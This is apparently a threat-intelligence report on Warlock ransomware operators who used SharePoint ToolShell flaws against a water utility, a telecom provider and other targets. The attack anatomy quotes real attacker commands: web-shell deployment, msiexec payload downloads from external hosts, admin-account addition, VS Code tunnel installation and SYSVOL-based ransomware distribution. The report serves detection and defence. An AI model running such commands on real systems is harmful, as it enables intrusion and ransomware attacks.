Warlock ransomware exploits SharePoint ToolShell flaws to hit water, telecom and government targets
By Sethu Satheesh · 6 Oct 2026 · 16 min read
Threat Actor: Warlock group (tracked as Storm-2603, GOLD SALEM, Longlegs) · Target: Critical infrastructure, government and education in Portuguese- and Spanish-speaking countries (water utility, telecom, regional government, university)
Source: www.security.com
Executive Summary
On October 1, 2026, the Symantec and Carbon Black Threat Hunter Team (Broadcom) published forensic research showing that the China-nexus operators behind Warlock ransomware are still breaking into organizations through Microsoft SharePoint vulnerabilities, more than a year after the "ToolShell" exploit chain first brought the group to prominence. Symantec tracks the actor as Longlegs (also tracked by Microsoft as Storm-2603) and reports that, over the preceding two months, the group attacked at least four organizations in Portuguese- and Spanish-speaking countries across Europe, Africa, and Latin America.1
The four victims included two critical-infrastructure operators — a water utility and a telecommunications provider — alongside a regional government body and a university.1 Symantec reconstructed one intrusion against a critical-infrastructure operator in detail: beginning July 22, 2026 with a web shell on an on-premises SharePoint server, the attackers harvested the farm's ASP.NET machine keys, achieved code execution inside the SharePoint application pool, moved laterally across the domain, installed a Visual Studio Code tunnel for covert remote access, and then — in the early hours of July 31 — pushed an AV/EDR-killing tool to at least 40 hosts within about two hours before staging the Warlock ransomware in the domain's SYSVOL share, from where ordinary Active Directory replication delivered it to at least 33 hosts.1
Attribution to a nation state is unsettled and vendor-dependent. Microsoft assesses Storm-2603 "with moderate confidence to be a China-based threat actor" and notes it has "not identified links between Storm-2603 and other known Chinese threat actors."2 Symantec describes the operator as "China-nexus" and ties Longlegs back to older activity clusters it tracks as CL-CRI-1040, CamoFei, and ChamelGang — a group associated with espionage.1 Sophos's Counter Threat Unit, which tracks the same operation as GOLD SALEM and notes the actor self-identifies as "Warlock Group," says it has "insufficient evidence to corroborate" the China attribution.3 The group emerged on the Russian-language RAMP forum in June 2025 and has deployed both Warlock and LockBit ransomware.23
Why it matters: the research is a reminder that the 2025 ToolShell SharePoint flaws (CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, CVE-2025-53771) remain a working route into unpatched on-premises deployments, and that patching alone is insufficient once machine keys have been stolen.14 It also exposes a gap worth watching: downstream coverage framed the campaign as "now including" newer 2026 SharePoint vulnerabilities, while the primary research pins only the 2025 ToolShell set to the group's arsenal and leaves the specific vulnerabilities used in the July 2026 intrusion unconfirmed.15
Verification of Claims
-
Claim: Warlock operators attacked at least four organizations across Europe, Africa, and Latin America in two months. → Verified → Symantec's Threat Hunter Team states it directly, naming a water utility, a telecommunications provider, a regional government body, and a university in Portuguese- and Spanish-speaking countries.1
-
Claim: In one intrusion the attackers disabled security software on 40+ hosts in ~2 hours, then ransomwared 33+ hosts via SYSVOL. → Verified → These are Symantec's own first-party telemetry figures for a single critical-infrastructure intrusion, with the SYSVOL replication path captured by
dfsrs.exeparentage on three further hosts.1 -
Claim: Initial access was gained by exploiting SharePoint ToolShell vulnerabilities. → Partially verified → Symantec states the initial vector was "likely" SharePoint exploitation and observed the machine-key-signed
__VIEWSTATEdeserialization method that is characteristic of ToolShell; it does not name the specific CVE used in this intrusion. Microsoft independently documented ToolShell exploitation by this actor in 2025.12 -
Claim: The K7RKScan vulnerable driver was used to disable security software in this intrusion. → Partially verified → Symantec says the vulnerable driver behind the AV/EDR killer (
a.exe) in this specific intrusion "remains unknown," and that K7RKScan (CVE-2025-1055) was the driver used "in other recent attacks" by the group.16 -
Claim: The Warlock operator is a China-based threat actor. → Partially verified → Microsoft assesses this with moderate confidence; Symantec calls it "China-nexus"; Sophos's CTU says it has insufficient evidence to corroborate nation-state attribution. The assessment is real and reportable; treating it as settled is the error.23
-
Claim: The Warlock operator is the same actor as the ChamelGang espionage group. → Partially verified → Symantec ties Longlegs to clusters it tracks as CL-CRI-1040, CamoFei, and ChamelGang. Microsoft states it has not identified links between Storm-2603 and other known Chinese threat actors — a direct conflict between first-party assessments.12
Timeline
| Date | Actor | Event | Source |
|---|---|---|---|
| June 2025 | Warlock Group | Operation surfaces on the Russian-language RAMP forum; Warlock ransomware emerges | 31 |
| July 8, 2025 | Microsoft | CVE-2025-49704 (code injection) and CVE-2025-49706 (spoofing) published for SharePoint Server | 78 |
| July 20–22, 2025 | Microsoft | CVE-2025-53770 (deserialization RCE, exploited in the wild) and CVE-2025-53771 published; Microsoft details ToolShell exploitation and Storm-2603 ransomware deployment | 492 |
| July 1, 2026 | CISA | Adds newer SharePoint deserialization flaw CVE-2026-45659 to the Known Exploited Vulnerabilities catalog | 10 |
| July 22, 2026 | Longlegs | Web shell installed on SharePoint server (Computer 1) via PowerShell WriteAllBytes to a LAYOUTS .aspx path |
1 |
| July 24, 2026 | Longlegs | Recon (net user /domain, whoami) on Computer 2; staging-artifact cleanup; DLL side-loading pairs dropped; nltest /domain_trusts run |
1 |
| July 27, 2026 | Longlegs | Out-of-band callback to an oastify[.]com Burp Collaborator subdomain with the target's own domain baked in |
1 |
| July 28, 2026 | Longlegs | System.Workflow.ComponentModel assembly loaded to reach the deserialization gadget; RCE in the SharePoint app pool; msiexec fetches payloads from catbox and wasabi |
1 |
| July 28–29, 2026 | Longlegs | Domain account SPSEPRDSetup added to local Administrators on Computers 3–5; VS Code tunnel installed on Computer 4; NetExec run from Computer 2 |
1 |
| July 31, 2026 | Longlegs | AV/EDR killer (a.exe) executed on 40+ hosts in ~2 hours; run.exe/rune.exe and ransom note deployed to 33+ hosts via SYSVOL |
1 |
| October 1, 2026 | Symantec | Threat Hunter Team publishes the campaign research | 1 |
| October 2, 2026 | The Record | Reports the campaign, framing it as including newer SharePoint vulnerabilities | 5 |
Attack Anatomy
Initial access and web shell
The group gains initial access by exploiting multiple vulnerabilities in on-premises Microsoft SharePoint Server (T1190).1 The first observed activity in the reconstructed intrusion was on July 22, 2026, when a web shell was written to the SharePoint LAYOUTS directory on Computer 1 using a PowerShell one-liner that base64-decodes an ASPX payload to disk (T1505.003):
powershell -nop -c "[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMON\microsoft shared\web server extensions\14\template\layouts\layout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"
Symantec notes the group drops the web shell into the LAYOUTS directory for multiple SharePoint versions at once, so it functions regardless of which version is installed.1
Machine-key harvest and ViewState deserialization (defender view)
The web shell's purpose is to harvest the SharePoint farm's ASP.NET machine keys.1 At a defender's level the weakness works like this: a SharePoint farm authenticates __VIEWSTATE data with its configured machine keys (the validation and decryption keys). An attacker who steals those keys can present a __VIEWSTATE value that carries a valid message authentication code, so the server accepts it as trusted and deserializes it. Deserializing attacker-chosen data reaches a gadget that turns a trusted-but-malicious object into code execution inside the SharePoint application pool worker (w3wp.exe). In the intrusion, Computer 1 repeatedly ran a PowerShell command that loads the assembly exposing that gadget (T1059.001):
"CSIDL_SYSTEM\cmd.exe" /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35')
The defensive consequence is that patching alone does not evict the attacker: once machine keys are stolen, they stay valid until rotated. Detection artifacts include web shells under LAYOUTS, the System.Workflow.ComponentModel assembly-load pattern from a worker process, and out-of-band callbacks to canary domains such as oastify[.]com carrying the victim's own domain name.1
Reconnaissance and credential access
Reconnaissance used living-off-the-land binaries: net user /domain and whoami for account and user discovery (T1087.002, T1033), and "CSIDL_SYSTEM\nltest.exe" /domain_trusts to enumerate Active Directory trust relationships (T1482).1 Later, NetExec (nxc.exe), the open-source successor to CrackMapExec, was run for AD enumeration, credential spraying (T1110.003), and remote command execution.1
Payload delivery and DLL side-loading
With code execution established, Computer 2 ran msiexec against three distinct packages on two legitimate hosting services in roughly ninety minutes (T1218.007, T1105), blending delivery into normal traffic:
msiexec.exe /q /i "hxxps://litter.catbox[.]moe/6f5tdt.msi"
msiexec.exe /q /i "hxxps://s3.wasabisys[.]com/fortifs/vamd64.msi"
msiexec /q /i hxxps://xn8xyt-drop.s3.wasabisys[.]com/xn8xyt.msi
The group used DLL side-loading throughout (T1574.001), pairing signed executables with malicious DLLs — for example doexe.exe with doexeloc.dll, and ssvagent.exe/logger.exe with gsdll64.dll.tmp and doexeloc.dll.tmp, staged in CSIDL_SYSTEM\0409\ before being copied into ProgramData. Early numerically-named staging files were deleted to tidy artifacts (T1070.004).1
Lateral movement and covert remote access
The attackers repeatedly added a domain account named SPSEPRDSetup to the local Administrators group on three further hosts (T1098.007), a likely masquerade of SharePoint's SPS/SP-prefixed service-account convention:
net localgroup administrators SPSEPRDSetup /add
On Computer 4 they installed Visual Studio Code's tunnel feature as a Windows service for covert remote access (T1543.003, T1219, T1572), relaying through Microsoft's own infrastructure so it blends into expected developer/admin traffic:
"CSIDL_WINDOWS\debug\code-insiders.exe" tunnel service install --accept-server-license-terms
Tooling was moved between hosts over mapped SMB admin shares (T1021.002).1
Defense evasion: bring-your-own-vulnerable-driver
In the early hours of July 31, the attackers pushed an AV/EDR-killing tool (a.exe) across the environment using a consistent one-liner that mapped an internal share, copied the tool, and launched it. The resulting execution was recorded on at least 40 hosts within about two hours. Symantec says the vulnerable driver abused in this intrusion is unknown, but that the group has used the signed-but-vulnerable K7RKScan driver (CVE-2025-1055) in other recent attacks to terminate protected security processes at the kernel level — the BYOVD technique (T1685).16
Ransomware deployment via SYSVOL
As protection fell on each host, two binaries — run.exe and rune.exe — and a ransom note titled how to restore your files.txt appeared on at least 33 hosts (T1486). The payload was staged in the domain's SYSVOL share and distributed domain-wide:
"CSIDL_SYSTEM\cmd.exe" /c copy \\[REMOVED]\SYSVOL\[VICTIM DOMAIN]\scripts\run\* CSIDL_PROFILE\public /y & start /B cmd /c "c:\users\public\run.exe 2>nul || exit" & start /B cmd /c "c:\users\public\rune.exe 2>nul || exit"
Telemetry from three further hosts recorded the Distributed File System Replication service (dfsrs.exe) as the parent delivering run.exe and rune.exe from the SYSVOL scripts\run path, confirming the payload reached those hosts through ordinary SYSVOL replication rather than a separate push.1
Loading diagram...
Threat Actor Profile
Name: Longlegs (as tracked by Symantec) Aliases: Storm-2603 (Microsoft); GOLD SALEM (Sophos / Secureworks Counter Threat Unit); self-identifies as "Warlock Group." Symantec additionally ties Longlegs to older clusters it tracks as CL-CRI-1040, CamoFei, and ChamelGang.123 Attribution confidence: Microsoft — moderate confidence, China-based, with no links identified to other known Chinese actors.2 Symantec — "China-nexus," with an asserted tie to the ChamelGang espionage cluster.1 Sophos CTU — insufficient evidence to corroborate the China attribution.3 Motivation: Financially motivated ransomware and extortion; a possible espionage overlap is asserted by Symantec and disputed by Microsoft.12
The operation surfaced on the Russian-language RAMP forum in June 2025 and has deployed both Warlock and LockBit ransomware.23 Sophos CTU reported roughly 60 published victims spanning North America, Europe, and South America, from small entities to large multinationals, and observed the group avoiding organizations in China and Russia.3 Symantec notes earlier Warlock activity against the United States, Brazil, India, Russia, Taiwan, and Japan, making the recent concentration on Portuguese- and Spanish-speaking countries notable — either opportunistic targeting of exposed SharePoint servers or more deliberate tasking.1
Tradecraft is heavy on living-off-the-land tooling, signed Microsoft binaries (VS Code Insiders tunnels), legitimate cloud file-sharing for payload delivery, and BYOVD for defense evasion — a toolkit built to blend into normal enterprise traffic.1
MITRE ATT&CK techniques (IDs verified live on attack.mitre.org):
| ID | Technique |
|---|---|
| T1190 | Exploit Public-Facing Application |
| T1505.003 | Server Software Component: Web Shell |
| T1059.001 | Command and Scripting Interpreter: PowerShell |
| T1105 | Ingress Tool Transfer |
| T1218.007 | System Binary Proxy Execution: Msiexec |
| T1574.001 | Hijack Execution Flow: DLL |
| T1087.002 | Account Discovery: Domain Account |
| T1033 | System Owner/User Discovery |
| T1482 | Domain Trust Discovery |
| T1110.003 | Brute Force: Password Spraying |
| T1098.007 | Account Manipulation: Additional Local or Domain Groups |
| T1543.003 | Create or Modify System Process: Windows Service |
| T1219 | Remote Access Tools |
| T1572 | Protocol Tunneling |
| T1021.002 | Remote Services: SMB/Windows Admin Shares |
| T1685 | Disable or Modify Tools |
| T1070.004 | Indicator Removal: File Deletion |
| T1486 | Data Encrypted for Impact |
OPSEC: Masquerading a malicious account as a SharePoint service account (SPSEPRDSetup); tunneling remote access through Microsoft infrastructure; downloading from legitimate services (catbox[.]moe, wasabisys[.]com); deleting early staging artifacts; and using SYSVOL replication rather than a noisy per-host push.1
Technical Indicators
cve_exploited_2025_toolshell:
- CVE-2025-49704 # SharePoint code injection (RCE), CVSS 8.8
- CVE-2025-49706 # SharePoint improper authentication (spoofing), CVSS 6.5
- CVE-2025-53770 # SharePoint deserialization of untrusted data (RCE), CVSS 9.8, exploited in the wild
- CVE-2025-53771 # SharePoint improper authentication (spoofing), CVSS 6.5
cve_byovd:
- CVE-2025-1055 # K7RKScan.sys IOCTL process-termination (used in other recent attacks; not confirmed in this intrusion)
file_sha256_warlock:
- 116ca4e88a1bcebb6c0da7fb431c8eca7b8ef3f9767194820c56091972ccac2c
- 155fb1cbdaea12c83ba92d18c88cf38bbc42bb684f913ca0bc26fcf115426a55
- 6d07f1232dc59b84038fd0b2e75fdd3d5b825882bb0dba9e6724b7b0823fa3ad
- 8b58f7811a2a2f2a5024220490473774f02759dd2dd904b5b9fabfbaae37125f
- 8ce8d8270ee9de02644530b8dd7fa78973b4a3b80f121e2c5f45ae68cce196f9
file_sha256_malicious_dll:
- 1edb2c0b537cd95bbd5fc16321b4c38a6adf325ccc7b588ad6acc980b0463b60
- 206f27ae820783b7755bca89f83a0fe096dbb510018dd65b63fc80bd20c03261
- 27b7591cf9e1283010ca98fa5dbe970a73fee0d8cde277639924c144718db7c0
- c46825fcc0d1bf7a8b192facb176d6bf916c9dccfd6fa994be691e3b0e585f4e
- e14240bac8277b0f6dd4d29ab5da20d246bcccae647e5fe8d19cdae7fe471b20
- fb3846c9ac53d1b841ada3a6b1091153fea41a169cb44fe0084097d1f4d45984
file_sha256_av_edr_killer:
- 73c5268256c9da5488cd9e2b79013060ac321c7e54129344dc7b51e268af36ea
file_sha256_vulnerable_driver:
- ae9f7fce57c7b928e659dccf0e00fa79cd9cd61a106f18d4e03f92dc3a03c295
file_sha256_suspicious:
- 37f94fe1b4a106f02b6f74a69cbc05e69c17406f688beef4c9a045ffcbd2e65e
- 9ceb01f8bf7d6dba2ae07f5bd6070de3ec67b5eb01f969b0ba85e74564fb83a7
- aaff04d84ef85353966aa4af186ff1254b72c068f33f802417b29dc23fb9f192
- e3204b05e2f3a29bb6e6fcc21dda77d7cd31dfa755c21da0aa8661b5619ee0a1
- eea631b5f7125239db0811e4682c2316ead69f9822e02d94fb5d8bf0d2faebed
- f7269f80f81e99d06a590d7ab374e12fdf7e5f55a02c2a46c342d670f8519fdf
network_payload_delivery:
- litter[.]catbox[.]moe
- xn8xyt-drop[.]s3[.]wasabisys[.]com
- catbox[.]moe
- wasabisys[.]com
network_oob_callback:
- '*.oastify[.]com' # Burp Collaborator OOB testing; victim domain baked into the subdomain
host_artifacts:
- 'layout2sp.aspx (web shell in SharePoint LAYOUTS directory)'
- 'code-insiders.exe installed as a Windows service (VS Code tunnel)'
- 'domain account SPSEPRDSetup added to local Administrators'
- 'run.exe, rune.exe, a.exe in C:\Users\Public'
- 'how to restore your files.txt (ransom note)'
- 'dfsrs.exe delivering run.exe/rune.exe from SYSVOL scripts\run'
note: >
SHA256 file hashes and the two network IOCs are published by Symantec's Threat
Hunter Team; labels are Symantec's. The AV/EDR-killer driver used in the detailed
intrusion was not identified by Symantec; K7RKScan (CVE-2025-1055) is attributed to
the group in other recent attacks. Network indicators are defanged.Legal and Regulatory Response
Microsoft issued patches and guidance for the ToolShell SharePoint vulnerabilities in July 2025 and publicly documented Storm-2603's exploitation and ransomware deployment at that time.2 The four ToolShell CVEs were published in July 2025, and CISA has continued to add newer SharePoint flaws to its Known Exploited Vulnerabilities catalog — including the deserialization vulnerability CVE-2026-45659 on July 1, 2026 — which The Record cites as the basis for describing the campaign as involving "newer" SharePoint vulnerabilities.510
No public indictment, sanctions designation, or coordinated law-enforcement takedown tied to the Warlock operation or to Longlegs / Storm-2603 / GOLD SALEM had been reported in the primary and vendor sources reviewed as of October 6, 2026; Sophos's CTU and Microsoft both treat the actor as an active, un-dismantled threat group.23
Impact Assessment
- Confirmed: At least four organizations attacked over two months — a water utility, a telecommunications provider, a regional government body, and a university — in Portuguese- and Spanish-speaking countries across Europe, Africa, and Latin America.1
- Confirmed: In one critical-infrastructure intrusion, security software was disabled on at least 40 hosts within about two hours and Warlock ransomware was deployed to at least 33 hosts via SYSVOL replication.1
- Reported, not independently confirmed: Sophos CTU counted roughly 60 published Warlock victims historically, spanning North America, Europe, and South America.3
- Estimated: Symantec frames the inclusion of critical-infrastructure operators as a reminder of the "potential real-world consequences" of ransomware against essential services; no operational or safety disruption to water or telecom service is evidenced in the report.1
- Unknown: Ransom demands, payments, data exfiltration volumes, downtime, and any impact to operational-technology / ICS systems (as distinct from the IT/Active Directory estate) have not been disclosed.1
Lessons and Defensive Recommendations
For SOC / detection engineers:
- Alert on web shells written under the SharePoint
LAYOUTSpath, on worker processes (w3wp.exe) spawning PowerShell that loadsSystem.Workflow.ComponentModel, and on outbound DNS/HTTP tooastify[.]comsubdomains carrying your own domain name.1 - Treat
code-insiders.exe tunnel service install,net localgroup administrators <acct> /add, andnltest /domain_trustson servers as high-signal events.1 - Hunt for
msiexec /q /ipulling fromcatbox[.]moeor*.wasabisys[.]com, and fordfsrs.exedelivering executables out of SYSVOLscriptspaths.1
For SharePoint / platform administrators:
- Apply the ToolShell patches (CVE-2025-49704/49706/53770/53771) and newer SharePoint fixes, but also rotate ASP.NET machine keys after any suspected compromise — patching does not invalidate stolen keys.14
- Enable AMSI integration and constrain the SharePoint app-pool identity's reach into the domain.2
For Active Directory / identity teams:
- Monitor SYSVOL for unexpected executables and tighten who can write to
scripts/ Group Policy paths; a writable SYSVOL turns one foothold into domain-wide code execution.1 - Watch for service-account-style names being added to local Administrators groups across multiple hosts in a short window.1
For leadership:
- A year-old vulnerability class is still ending in domain-wide ransomware against critical infrastructure; prioritize machine-key rotation, BYOVD driver blocklisting, and tested offline backups over assuming "patched" equals "safe."1
- Treat vendor attribution as a spectrum: the China nexus here is a moderate-confidence assessment disputed by another first-party researcher, not an established fact.23
Sources
Footnotes
-
Symantec / Security.com (Threat Hunter Team) — Warlock Ransomware Attackers Hit Water and Telecom Operators — October 1, 2026 ↩ ↩2 ↩3 ↩4 ↩5 ↩6 ↩7 ↩8 ↩9 ↩10 ↩11 ↩12 ↩13 ↩14 ↩15 ↩16 ↩17 ↩18 ↩19 ↩20 ↩21 ↩22 ↩23 ↩24 ↩25 ↩26 ↩27 ↩28 ↩29 ↩30 ↩31 ↩32 ↩33 ↩34 ↩35 ↩36 ↩37 ↩38 ↩39 ↩40 ↩41 ↩42 ↩43 ↩44 ↩45 ↩46
-
Microsoft Security — Disrupting active exploitation of on-premises SharePoint vulnerabilities — July 22, 2025 ↩ ↩2 ↩3 ↩4 ↩5 ↩6 ↩7 ↩8 ↩9 ↩10 ↩11 ↩12 ↩13 ↩14
-
Sophos (Counter Threat Unit) — GOLD SALEM's Warlock operation joins busy ransomware landscape — September 19, 2025 ↩ ↩2 ↩3 ↩4 ↩5 ↩6 ↩7 ↩8 ↩9 ↩10 ↩11
-
NVD — CVE-2025-53770: SharePoint Server deserialization of untrusted data — July 20, 2025 ↩ ↩2 ↩3
-
The Record (Recorded Future News) — 'Warlock' ransomware used in attacks on critical infrastructure in Portuguese, Spanish-speaking countries — October 2, 2026 ↩ ↩2 ↩3
-
NVD — CVE-2025-1055: K7RKScan.sys IOCTL process termination — June 11, 2025 ↩ ↩2
-
NVD — CVE-2025-49704: SharePoint code injection — July 8, 2025 ↩
-
NVD — CVE-2025-49706: SharePoint improper authentication (spoofing) — July 8, 2025 ↩
-
NVD — CVE-2025-53771: SharePoint improper authentication (spoofing) — July 20, 2025 ↩
-
CISA — CISA Adds One Known Exploited Vulnerability to Catalog (CVE-2026-45659) — July 1, 2026 ↩ ↩2
Related Research
South Africa's air navigation provider ATNS found ransomware-linked malware in an OT network supporting aviation weather services, with suspected data exfiltration to China-based IPs. No flights were disrupted; the actor is unknown and a forensic probe is under way.
The BlackSuit ransomware group (a rebrand of Royal Ransomware) compromised CDK Global, the dominant Dealer Management System provider for North American auto dealerships, causing a weeks-long outage affecting ~15,000 dealerships' ability to sell, finance, service, and manage vehicles — one of the most disruptive ransomware incidents against a critical software supplier in 2024.
The ALPHV/BlackCat ransomware group compromised Change Healthcare, the largest US healthcare claims clearinghouse, causing a nationwide outage of pharmacy, medical claims, and payment processing affecting hundreds of thousands of providers, pharmacies, and patients — the most significant cyberattack on US healthcare infrastructure to date.